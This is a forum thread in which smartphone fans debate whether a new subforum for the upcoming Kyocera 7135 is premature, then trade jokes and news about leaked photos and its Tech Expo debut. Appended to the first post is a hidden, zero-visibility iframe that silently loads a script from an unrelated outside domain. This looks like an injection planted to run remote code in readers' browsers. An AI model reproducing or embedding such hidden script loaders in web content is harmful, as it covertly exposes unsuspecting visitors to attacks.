+ Reply to Thread

A Bit Premature for a New Forum

Wow... talk about having an excited forum website. I think it's a bit premature that a new forum was created. I think new forums should be created when betas or test units have shipped. What happens if this was vaporware, unlikely but always a possibility....

-Ben<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I agree. Let's all just sit around and keep our opinions to ourselves until we have some tangible hardware to touch.

Let's not assume what neat things could be done with the smart slot, or even consider that Kyocera might lurk here someday and think our thoughts and suggestions might be worth considering.

I mean, who needs to see a larger picture of the phone anyway? I'd much rather guess what it looks like close up. And I really don't need to know who's doing the first review of it or when it actually happens...

I believe Jimmyjoe created this forum for people excited about the new 7135 to discuss and learn about what features it will have, and not to clutter up the 6035 board with tons of information &amp; links about the new phone. That way those that are not interested in chatting about the 7135 don't have to wade through posts pertaining to it.
    --Jazz--

Did anyone catch the sarcasm in my last post?

BRING ON THE 7135!!!

Jeeze.....who &amp;^%( cares?!?!? Thanks jimmy for the new forum. Obviously people have opinions, now they can stick to the 6035 if they don't want to have anything to do with the new one.

Jimmyjoe, you keep it up, u r deMan!!! I think the new forum is right on track and I'm looking forward to more discussion.

--terry

Premature!? I have already started my personal 7135 phone (i.e., less trips to Starbucks, no more haircuts-shaved my head, etc.) Keep the info and opinions coming!!!

Good job Jimmyjoe!

P.S. Can the other threads covering the 7135 be moved here our do we have to create links to them?
    This 'telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us. -- Western Union internal memo, 1876.

Should have been: I have already started my personal 7135 phone fund!!!
    This 'telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us. -- Western Union internal memo, 1876.

I think that I have "hinted" enough to my wife these past two days that she has figured out that the 7135 will be a great Christmas gift, and fancy that it looks to be released about the same time.... wow how the stars are lining up

--terry

Hell, my wife says I can only have one if she does too....

LOL.... same here too.... He can have one if I get one too!
    --Jazz--

Wow... the hardware exists (as per that user's review from Tech Expo)... it looks like Kyocera pulled one on us. And I thought we had quality spies in these forums.

Kyocera 1
    SmartPhoneSource.com 0

Scrap that premature comment....

-Ben

Originally posted by bserebin Wow... the hardware exists (as per that user's review from Tech Expo)... it looks like Kyocera pulled one on us. And I thought we had quality spies in these forums.

Kyocera 1
    SmartPhoneSource.com 0

Scrap that premature comment....

-Ben
    This firum has been dicussing this handset for a month or so now. We had leaked images a while back. So yes, smartphone source knew it was coming....Kyocera did not surprise us, just made us happier by giveing the full scoop by announcing it

I saw the leaked photos, but the 7135 was so far in production, and the photos did not have hard facts. Did anyone mention it would be showcased at Tech Expo, no. A scant photo and the "possibility of a slot" does not cut it for me.

Come on... it was an intelligence failure.

-Ben

More power to the new phone.

However, being a new owner of the 6035, and it's already simplified my life a great deal, I will probably sit back and wait another 3-4 years before I get another phone.

Because of the 6035, maybe longer.

Originally posted by bserebin I saw the leaked photos, but the 7135 was so far in production, and the photos did not have hard facts. Did anyone mention it would be showcased at Tech Expo, no.
    Um, YES, right here

I indicated that there was something to look for. Kyocera Wireless at a PC Expo?!?!? The only thing they have to do with PC's are the smartphones, and I did not think they would be announcing the 6035....again.

I think this is one of the best ideas yet for the board. Great organization JJ.

last post was me...sorry I forgot to sign in. Not sure if I like the Guest thing, I'm sure there's a good reason for it.

Originally posted by astamand Did anyone catch the sarcasm in my last post?

BRING ON THE 7135!!!
    I caught it...even without the tags!